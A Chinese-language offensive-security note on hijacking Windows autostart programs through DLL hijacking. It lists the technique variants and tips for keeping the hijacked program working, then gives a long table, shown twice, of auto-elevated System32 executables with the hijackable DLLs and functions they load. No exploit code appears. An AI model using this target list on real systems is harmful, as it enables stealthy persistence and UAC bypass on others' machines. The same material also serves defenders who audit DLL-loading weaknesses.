劫持自启动程序

原理：
通过篡改、替换或代理原dll文件来达到劫持。
方法：
1.DLL替换：用恶意DLL替换合法的DLL。
2.DLL搜索顺序劫持：在应用程序指定的不带路径的DLL中。根据搜索顺序，将恶意DLL放在实际DLL之前的搜索位置。大部分时候都是目标应用程序的工作目录。（微软文档：https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order）
3.Phantom DLL劫持：丢弃一个恶意的DLL来代替合法应用程序尝试加载的丢失/不存在的DLL。
4.DLL重定向：通过编辑，改变DLL被搜索的位置，例如%PATH%环境变量，或.exe.manifest/.exe.local文件。
5.WinSxS DLL替换：用恶意DLL替换WinSxS文件夹中合法的DLL。
6.相对路径DLL劫持：将合法的应用程序复制到用户可写文件夹中，并添加恶意DLL。
实际使用：
寻找开机自启的exe文件，并使用Process Explorer寻找是否有not found的dll文件，有的话直接放在对应位置（顺便提交拿一个CVE），没有就替换正常要加载的dll。建议做一个dll转发来保证程序正常运行。
厚颜无耻的放一个自己的文章：
[原创]一种劫持 explorer 过启动的想法-软件逆向-看雪论坛-安全社区|安全招聘|bbs.pediy.com
[原创]一种劫持 explorer 过启动的想法-软件逆向-看雪论坛-安全社区|安全招聘|bbs.pediy.com
可以考虑搭配下面这个文章实现user权限的劫持
Windows Telemetry service elevation of privilege
secret club
附表
此处列出“c:\windows\system32”中易受DLL Hijacking的所有可执行文件。每个可执行文件的旁边是一个或多个可以被劫持的DLL，以及被调用的DLL的函数，可以方便的进行利用。
来源：
Hijacking DLLs in Windows
Auto-elevated
Executable
DLL
Procedure
✔️
bthudtask.exe
DEVOBJ.dll
DllMain
✔️
computerdefaults.exe
CRYPTBASE.DLL
DllMain
✔️
computerdefaults.exe
edputil.dll
DllMain
✔️
computerdefaults.exe
edputil.dll
EdpGetIsManaged
✔️
computerdefaults.exe
MLANG.dll
ConvertINetUnicodeToMultiByte
✔️
computerdefaults.exe
MLANG.dll
DllMain
✔️
computerdefaults.exe
PROPSYS.dll
DllMain
✔️
computerdefaults.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
✔️
computerdefaults.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
✔️
computerdefaults.exe
Secur32.dll
DllMain
✔️
computerdefaults.exe
SSPICLI.DLL
DllMain
✔️
computerdefaults.exe
SSPICLI.DLL
GetUserNameExW
✔️
computerdefaults.exe
WININET.dll
DllMain
✔️
computerdefaults.exe
WININET.dll
GetUrlCacheEntryBinaryBlob
✔️
dccw.exe
ColorAdapterClient.dll
DllMain
✔️
dccw.exe
dxva2.dll
DllMain
✔️
dccw.exe
mscms.dll
DccwReleaseDisplayProfileAssociationList
✔️
dccw.exe
mscms.dll
DllMain
✔️
dccw.exe
mscms.dll
WcsGetCalibrationManagementState
✔️
dccw.exe
mscms.dll
WcsSetCalibrationManagementState
✔️
dccw.exe
USERENV.dll
DllMain
✔️
easinvoker.exe
AUTHZ.dll
DllMain
✔️
easinvoker.exe
netutils.dll
DllMain
✔️
easinvoker.exe
samcli.dll
DllMain
✔️
easinvoker.exe
SAMLIB.dll
DllMain
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
DllMain
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
FlushInProcTraceSession
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
InitializeInProcLogger
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
InitializeInProcTraceFlushTrigger
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
InitializeInProcTraceSession
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
ShutdownInProcLogger
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
ShutdownInProcTraceSession
✔️
easpolicymanagerbrokerhost.exe
InprocLogger.dll
StopInProcTraceSession
✔️
easpolicymanagerbrokerhost.exe
policymanager.dll
DllMain
✔️
fodhelper.exe
CRYPTBASE.DLL
DllMain
✔️
fodhelper.exe
edputil.dll
DllMain
✔️
fodhelper.exe
edputil.dll
EdpGetIsManaged
✔️
fodhelper.exe
MLANG.dll
ConvertINetUnicodeToMultiByte
✔️
fodhelper.exe
MLANG.dll
DllMain
✔️
fodhelper.exe
PROPSYS.dll
DllMain
✔️
fodhelper.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
✔️
fodhelper.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
✔️
fodhelper.exe
Secur32.dll
DllMain
✔️
fodhelper.exe
SSPICLI.DLL
DllMain
✔️
fodhelper.exe
SSPICLI.DLL
GetUserNameExW
✔️
fodhelper.exe
WININET.dll
DllMain
✔️
fodhelper.exe
WININET.dll
GetUrlCacheEntryBinaryBlob
✔️
fsavailux.exe
DEVOBJ.dll
DllMain
✔️
fxsunatd.exe
FXSAPI.dll
DllMain
✔️
fxsunatd.exe
FXSAPI.dll
FaxConnectFaxServerW
✔️
fxsunatd.exe
IPHLPAPI.DLL
DllMain
✔️
fxsunatd.exe
PROPSYS.dll
DllMain
✔️
immersivetpmvscmgrsvr.exe
DEVOBJ.dll
DllMain
✔️
iscsicli.exe
DEVOBJ.dll
DllMain
✔️
iscsicli.exe
ISCSIDSC.dll
DllMain
✔️
iscsicli.exe
ISCSIDSC.dll
GetIScsiVersionInformation
✔️
iscsicli.exe
ISCSIUM.dll
DiscpAllocMemory
✔️
iscsicli.exe
ISCSIUM.dll
DiscpRegisterHeap
✔️
iscsicli.exe
ISCSIUM.dll
DllMain
✔️
iscsicli.exe
WMICLNT.dll
DllMain
✔️
mdsched.exe
bcd.dll
DllMain
✔️
mschedexe.exe
MaintenanceUI.dll
DllMain
✔️
msconfig.exe
ATL.DLL
AtlModuleInit
✔️
msconfig.exe
ATL.DLL
AtlModuleRegisterClassObjects
✔️
msconfig.exe
ATL.DLL
DllMain
✔️
msconfig.exe
bcd.dll
DllMain
✔️
msdt.exe
ATL.DLL
DllMain
✔️
msdt.exe
Cabinet.dll
DllMain
✔️
msdt.exe
SSPICLI.DLL
DllMain
✔️
msdt.exe
UxTheme.dll
DllMain
✔️
msdt.exe
wer.dll
DllMain
✔️
msdt.exe
WINHTTP.dll
DllMain
✔️
multidigimon.exe
NInput.dll
DllMain
✔️
netplwiz.exe
CRYPTBASE.dll
DllMain
✔️
netplwiz.exe
DSROLE.dll
DllMain
✔️
netplwiz.exe
DSROLE.dll
DsRoleGetPrimaryDomainInformation
✔️
netplwiz.exe
NETPLWIZ.dll
DllMain
✔️
netplwiz.exe
NETPLWIZ.dll
UsersRunDllW
✔️
netplwiz.exe
netutils.dll
DllMain
✔️
netplwiz.exe
netutils.dll
NetApiBufferFree
✔️
netplwiz.exe
PROPSYS.dll
DllMain
✔️
netplwiz.exe
samcli.dll
DllMain
✔️
netplwiz.exe
samcli.dll
NetUserGetInfo
✔️
netplwiz.exe
SAMLIB.dll
DllMain
✔️
netplwiz.exe
SAMLIB.dll
SamConnect
✔️
netplwiz.exe
SAMLIB.dll
SamEnumerateDomainsInSamServer
✔️
netplwiz.exe
SAMLIB.dll
SamFreeMemory
✔️
optionalfeatures.exe
DUI70.dll
DllMain
✔️
optionalfeatures.exe
DUI70.dll
InitProcessPriv
✔️
optionalfeatures.exe
DUI70.dll
RegisterBaseControls
✔️
optionalfeatures.exe
DUI70.dll
RegisterCommonControls
✔️
optionalfeatures.exe
DUI70.dll
RegisterExtendedControls
✔️
optionalfeatures.exe
DUI70.dll
RegisterStandardControls
✔️
optionalfeatures.exe
msi.dll
DllMain
✔️
optionalfeatures.exe
OLEACC.dll
CreateStdAccessibleObject
✔️
optionalfeatures.exe
OLEACC.dll
DllMain
✔️
optionalfeatures.exe
OLEACC.dll
GetRoleTextW
✔️
optionalfeatures.exe
osbaseln.dll
CloseOsBaseline
✔️
optionalfeatures.exe
osbaseln.dll
DllMain
✔️
optionalfeatures.exe
osbaseln.dll
OpenOsBaseline
✔️
optionalfeatures.exe
PROPSYS.dll
DllMain
✔️
perfmon.exe
ATL.DLL
DllMain
✔️
perfmon.exe
credui.dll
DllMain
✔️
perfmon.exe
SspiCli.dll
DllMain
✔️
printui.exe
IPHLPAPI.DLL
DllMain
✔️
printui.exe
printui.dll
DllMain
✔️
printui.exe
printui.dll
PrintUIEntryW
✔️
printui.exe
PROPSYS.dll
DllMain
✔️
printui.exe
puiapi.dll
DllMain
✔️
recdisc.exe
bcd.dll
DllMain
✔️
recdisc.exe
Cabinet.dll
DllMain
✔️
recdisc.exe
ReAgent.dll
DllMain
✔️
rstrui.exe
bcd.dll
DllMain
✔️
rstrui.exe
ktmw32.dll
DllMain
✔️
rstrui.exe
SPP.dll
DllMain
✔️
rstrui.exe
SPP.dll
SxTracerGetThreadContextRetail
✔️
rstrui.exe
SRCORE.dll
DllMain
✔️
rstrui.exe
SRCORE.dll
SrFreeRestoreStatus
✔️
rstrui.exe
VSSAPI.DLL
DllMain
✔️
rstrui.exe
VssTrace.DLL
DllMain
✔️
rstrui.exe
wer.dll
DllMain
✔️
sdclt.exe
bcd.dll
DllMain
✔️
sdclt.exe
Cabinet.dll
DllMain
✔️
sdclt.exe
CLDAPI.dll
CfGetPlaceholderStateFromAttributeTag
✔️
sdclt.exe
CLDAPI.dll
DllMain
✔️
sdclt.exe
CRYPTBASE.DLL
DllMain
✔️
sdclt.exe
edputil.dll
DllMain
✔️
sdclt.exe
edputil.dll
EdpGetIsManaged
✔️
sdclt.exe
FLTLIB.DLL
DllMain
✔️
sdclt.exe
PROPSYS.dll
DllMain
✔️
sdclt.exe
PROPSYS.dll
PSCreateMemoryPropertyStore
✔️
sdclt.exe
PROPSYS.dll
PSPropertyBag_WriteDWORD
✔️
sdclt.exe
ReAgent.dll
DllMain
✔️
sdclt.exe
SPP.dll
DllMain
✔️
sdclt.exe
SPP.dll
SxTracerGetThreadContextRetail
✔️
sdclt.exe
SspiCli.dll
DllMain
✔️
sdclt.exe
SspiCli.dll
GetUserNameExW
✔️
sdclt.exe
UxTheme.dll
DllMain
✔️
sdclt.exe
VSSAPI.DLL
DllMain
✔️
sdclt.exe
VssTrace.DLL
DllMain
✔️
sdclt.exe
wer.dll
DllMain
✔️
sdclt.exe
WTSAPI32.dll
DllMain
✔️
systempropertiesadvanced.exe
bcd.dll
DllMain
✔️
systempropertiesadvanced.exe
credui.dll
DllMain
✔️
systempropertiesadvanced.exe
DNSAPI.dll
DllMain
✔️
systempropertiesadvanced.exe
DSROLE.DLL
DllMain
✔️
systempropertiesadvanced.exe
DSROLE.DLL
DsRoleGetPrimaryDomainInformation
✔️
systempropertiesadvanced.exe
LOGONCLI.DLL
DllMain
✔️
systempropertiesadvanced.exe
netid.dll
CreateNetIDPropertyPage
✔️
systempropertiesadvanced.exe
netid.dll
DllMain
✔️
systempropertiesadvanced.exe
NETUTILS.DLL
DllMain
✔️
systempropertiesadvanced.exe
SRVCLI.DLL
DllMain
✔️
systempropertiesadvanced.exe
WINBRAND.dll
DllMain
✔️
systempropertiesadvanced.exe
WINSTA.dll
DllMain
✔️
systempropertiesadvanced.exe
WKSCLI.DLL
DllMain
✔️
systempropertiescomputername.exe
bcd.dll
DllMain
✔️
systempropertiescomputername.exe
WINSTA.dll
DllMain
✔️
systempropertiesdataexecutionprevention.exe
bcd.dll
DllMain
✔️
systempropertiesdataexecutionprevention.exe
WINSTA.dll
DllMain
✔️
systempropertieshardware.exe
bcd.dll
DllMain
✔️
systempropertieshardware.exe
WINSTA.dll
DllMain
✔️
systempropertiesprotection.exe
bcd.dll
DllMain
✔️
systempropertiesprotection.exe
WINSTA.dll
DllMain
✔️
systempropertiesremote.exe
bcd.dll
DllMain
✔️
systempropertiesremote.exe
WINSTA.dll
DllMain
✔️
systemreset.exe
bcd.dll
BcdCloseObject
✔️
systemreset.exe
bcd.dll
BcdCloseStore
✔️
systemreset.exe
bcd.dll
BcdFlushStore
✔️
systemreset.exe
bcd.dll
BcdGetElementData
✔️
systemreset.exe
bcd.dll
BcdOpenObject
✔️
systemreset.exe
bcd.dll
BcdOpenStore

Auto-elevated	Executable	DLL	Procedure
✔️	bthudtask.exe	DEVOBJ.dll	DllMain
✔️	computerdefaults.exe	CRYPTBASE.DLL	DllMain
✔️	computerdefaults.exe	edputil.dll	DllMain
✔️	computerdefaults.exe	edputil.dll	EdpGetIsManaged
✔️	computerdefaults.exe	MLANG.dll	ConvertINetUnicodeToMultiByte
✔️	computerdefaults.exe	MLANG.dll	DllMain
✔️	computerdefaults.exe	PROPSYS.dll	DllMain
✔️	computerdefaults.exe	PROPSYS.dll	PSCreateMemoryPropertyStore
✔️	computerdefaults.exe	PROPSYS.dll	PSPropertyBag_WriteDWORD
✔️	computerdefaults.exe	Secur32.dll	DllMain
✔️	computerdefaults.exe	SSPICLI.DLL	DllMain
✔️	computerdefaults.exe	SSPICLI.DLL	GetUserNameExW
✔️	computerdefaults.exe	WININET.dll	DllMain
✔️	computerdefaults.exe	WININET.dll	GetUrlCacheEntryBinaryBlob
✔️	dccw.exe	ColorAdapterClient.dll	DllMain
✔️	dccw.exe	dxva2.dll	DllMain
✔️	dccw.exe	mscms.dll	DccwReleaseDisplayProfileAssociationList
✔️	dccw.exe	mscms.dll	DllMain
✔️	dccw.exe	mscms.dll	WcsGetCalibrationManagementState
✔️	dccw.exe	mscms.dll	WcsSetCalibrationManagementState
✔️	dccw.exe	USERENV.dll	DllMain
✔️	easinvoker.exe	AUTHZ.dll	DllMain
✔️	easinvoker.exe	netutils.dll	DllMain
✔️	easinvoker.exe	samcli.dll	DllMain
✔️	easinvoker.exe	SAMLIB.dll	DllMain
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	DllMain
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	FlushInProcTraceSession
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	InitializeInProcLogger
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	InitializeInProcTraceFlushTrigger
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	InitializeInProcTraceSession
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	ShutdownInProcLogger
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	ShutdownInProcTraceSession
✔️	easpolicymanagerbrokerhost.exe	InprocLogger.dll	StopInProcTraceSession
✔️	easpolicymanagerbrokerhost.exe	policymanager.dll	DllMain
✔️	fodhelper.exe	CRYPTBASE.DLL	DllMain
✔️	fodhelper.exe	edputil.dll	DllMain
✔️	fodhelper.exe	edputil.dll	EdpGetIsManaged
✔️	fodhelper.exe	MLANG.dll	ConvertINetUnicodeToMultiByte
✔️	fodhelper.exe	MLANG.dll	DllMain
✔️	fodhelper.exe	PROPSYS.dll	DllMain
✔️	fodhelper.exe	PROPSYS.dll	PSCreateMemoryPropertyStore
✔️	fodhelper.exe	PROPSYS.dll	PSPropertyBag_WriteDWORD
✔️	fodhelper.exe	Secur32.dll	DllMain
✔️	fodhelper.exe	SSPICLI.DLL	DllMain
✔️	fodhelper.exe	SSPICLI.DLL	GetUserNameExW
✔️	fodhelper.exe	WININET.dll	DllMain
✔️	fodhelper.exe	WININET.dll	GetUrlCacheEntryBinaryBlob
✔️	fsavailux.exe	DEVOBJ.dll	DllMain
✔️	fxsunatd.exe	FXSAPI.dll	DllMain
✔️	fxsunatd.exe	FXSAPI.dll	FaxConnectFaxServerW
✔️	fxsunatd.exe	IPHLPAPI.DLL	DllMain
✔️	fxsunatd.exe	PROPSYS.dll	DllMain
✔️	immersivetpmvscmgrsvr.exe	DEVOBJ.dll	DllMain
✔️	iscsicli.exe	DEVOBJ.dll	DllMain
✔️	iscsicli.exe	ISCSIDSC.dll	DllMain
✔️	iscsicli.exe	ISCSIDSC.dll	GetIScsiVersionInformation
✔️	iscsicli.exe	ISCSIUM.dll	DiscpAllocMemory
✔️	iscsicli.exe	ISCSIUM.dll	DiscpRegisterHeap
✔️	iscsicli.exe	ISCSIUM.dll	DllMain
✔️	iscsicli.exe	WMICLNT.dll	DllMain
✔️	mdsched.exe	bcd.dll	DllMain
✔️	mschedexe.exe	MaintenanceUI.dll	DllMain
✔️	msconfig.exe	ATL.DLL	AtlModuleInit
✔️	msconfig.exe	ATL.DLL	AtlModuleRegisterClassObjects
✔️	msconfig.exe	ATL.DLL	DllMain
✔️	msconfig.exe	bcd.dll	DllMain
✔️	msdt.exe	ATL.DLL	DllMain
✔️	msdt.exe	Cabinet.dll	DllMain
✔️	msdt.exe	SSPICLI.DLL	DllMain
✔️	msdt.exe	UxTheme.dll	DllMain
✔️	msdt.exe	wer.dll	DllMain
✔️	msdt.exe	WINHTTP.dll	DllMain
✔️	multidigimon.exe	NInput.dll	DllMain
✔️	netplwiz.exe	CRYPTBASE.dll	DllMain
✔️	netplwiz.exe	DSROLE.dll	DllMain
✔️	netplwiz.exe	DSROLE.dll	DsRoleGetPrimaryDomainInformation
✔️	netplwiz.exe	NETPLWIZ.dll	DllMain
✔️	netplwiz.exe	NETPLWIZ.dll	UsersRunDllW
✔️	netplwiz.exe	netutils.dll	DllMain
✔️	netplwiz.exe	netutils.dll	NetApiBufferFree
✔️	netplwiz.exe	PROPSYS.dll	DllMain
✔️	netplwiz.exe	samcli.dll	DllMain
✔️	netplwiz.exe	samcli.dll	NetUserGetInfo
✔️	netplwiz.exe	SAMLIB.dll	DllMain
✔️	netplwiz.exe	SAMLIB.dll	SamConnect
✔️	netplwiz.exe	SAMLIB.dll	SamEnumerateDomainsInSamServer
✔️	netplwiz.exe	SAMLIB.dll	SamFreeMemory
✔️	optionalfeatures.exe	DUI70.dll	DllMain
✔️	optionalfeatures.exe	DUI70.dll	InitProcessPriv
✔️	optionalfeatures.exe	DUI70.dll	RegisterBaseControls
✔️	optionalfeatures.exe	DUI70.dll	RegisterCommonControls
✔️	optionalfeatures.exe	DUI70.dll	RegisterExtendedControls
✔️	optionalfeatures.exe	DUI70.dll	RegisterStandardControls
✔️	optionalfeatures.exe	msi.dll	DllMain
✔️	optionalfeatures.exe	OLEACC.dll	CreateStdAccessibleObject
✔️	optionalfeatures.exe	OLEACC.dll	DllMain
✔️	optionalfeatures.exe	OLEACC.dll	GetRoleTextW
✔️	optionalfeatures.exe	osbaseln.dll	CloseOsBaseline
✔️	optionalfeatures.exe	osbaseln.dll	DllMain
✔️	optionalfeatures.exe	osbaseln.dll	OpenOsBaseline
✔️	optionalfeatures.exe	PROPSYS.dll	DllMain
✔️	perfmon.exe	ATL.DLL	DllMain
✔️	perfmon.exe	credui.dll	DllMain
✔️	perfmon.exe	SspiCli.dll	DllMain
✔️	printui.exe	IPHLPAPI.DLL	DllMain
✔️	printui.exe	printui.dll	DllMain
✔️	printui.exe	printui.dll	PrintUIEntryW
✔️	printui.exe	PROPSYS.dll	DllMain
✔️	printui.exe	puiapi.dll	DllMain
✔️	recdisc.exe	bcd.dll	DllMain
✔️	recdisc.exe	Cabinet.dll	DllMain
✔️	recdisc.exe	ReAgent.dll	DllMain
✔️	rstrui.exe	bcd.dll	DllMain
✔️	rstrui.exe	ktmw32.dll	DllMain
✔️	rstrui.exe	SPP.dll	DllMain
✔️	rstrui.exe	SPP.dll	SxTracerGetThreadContextRetail
✔️	rstrui.exe	SRCORE.dll	DllMain
✔️	rstrui.exe	SRCORE.dll	SrFreeRestoreStatus
✔️	rstrui.exe	VSSAPI.DLL	DllMain
✔️	rstrui.exe	VssTrace.DLL	DllMain
✔️	rstrui.exe	wer.dll	DllMain
✔️	sdclt.exe	bcd.dll	DllMain
✔️	sdclt.exe	Cabinet.dll	DllMain
✔️	sdclt.exe	CLDAPI.dll	CfGetPlaceholderStateFromAttributeTag
✔️	sdclt.exe	CLDAPI.dll	DllMain
✔️	sdclt.exe	CRYPTBASE.DLL	DllMain
✔️	sdclt.exe	edputil.dll	DllMain
✔️	sdclt.exe	edputil.dll	EdpGetIsManaged
✔️	sdclt.exe	FLTLIB.DLL	DllMain
✔️	sdclt.exe	PROPSYS.dll	DllMain
✔️	sdclt.exe	PROPSYS.dll	PSCreateMemoryPropertyStore
✔️	sdclt.exe	PROPSYS.dll	PSPropertyBag_WriteDWORD
✔️	sdclt.exe	ReAgent.dll	DllMain
✔️	sdclt.exe	SPP.dll	DllMain
✔️	sdclt.exe	SPP.dll	SxTracerGetThreadContextRetail
✔️	sdclt.exe	SspiCli.dll	DllMain
✔️	sdclt.exe	SspiCli.dll	GetUserNameExW
✔️	sdclt.exe	UxTheme.dll	DllMain
✔️	sdclt.exe	VSSAPI.DLL	DllMain
✔️	sdclt.exe	VssTrace.DLL	DllMain
✔️	sdclt.exe	wer.dll	DllMain
✔️	sdclt.exe	WTSAPI32.dll	DllMain
✔️	systempropertiesadvanced.exe	bcd.dll	DllMain
✔️	systempropertiesadvanced.exe	credui.dll	DllMain
✔️	systempropertiesadvanced.exe	DNSAPI.dll	DllMain
✔️	systempropertiesadvanced.exe	DSROLE.DLL	DllMain
✔️	systempropertiesadvanced.exe	DSROLE.DLL	DsRoleGetPrimaryDomainInformation
✔️	systempropertiesadvanced.exe	LOGONCLI.DLL	DllMain
✔️	systempropertiesadvanced.exe	netid.dll	CreateNetIDPropertyPage
✔️	systempropertiesadvanced.exe	netid.dll	DllMain
✔️	systempropertiesadvanced.exe	NETUTILS.DLL	DllMain
✔️	systempropertiesadvanced.exe	SRVCLI.DLL	DllMain
✔️	systempropertiesadvanced.exe	WINBRAND.dll	DllMain
✔️	systempropertiesadvanced.exe	WINSTA.dll	DllMain
✔️	systempropertiesadvanced.exe	WKSCLI.DLL	DllMain
✔️	systempropertiescomputername.exe	bcd.dll	DllMain
✔️	systempropertiescomputername.exe	WINSTA.dll	DllMain
✔️	systempropertiesdataexecutionprevention.exe	bcd.dll	DllMain
✔️	systempropertiesdataexecutionprevention.exe	WINSTA.dll	DllMain
✔️	systempropertieshardware.exe	bcd.dll	DllMain
✔️	systempropertieshardware.exe	WINSTA.dll	DllMain
✔️	systempropertiesprotection.exe	bcd.dll	DllMain
✔️	systempropertiesprotection.exe	WINSTA.dll	DllMain
✔️	systempropertiesremote.exe	bcd.dll	DllMain
✔️	systempropertiesremote.exe	WINSTA.dll	DllMain
✔️	systemreset.exe	bcd.dll	BcdCloseObject
✔️	systemreset.exe	bcd.dll	BcdCloseStore
✔️	systemreset.exe	bcd.dll	BcdFlushStore
✔️	systemreset.exe	bcd.dll	BcdGetElementData
✔️	systemreset.exe	bcd.dll	BcdOpenObject
✔️	systemreset.exe	bcd.dll	BcdOpenStore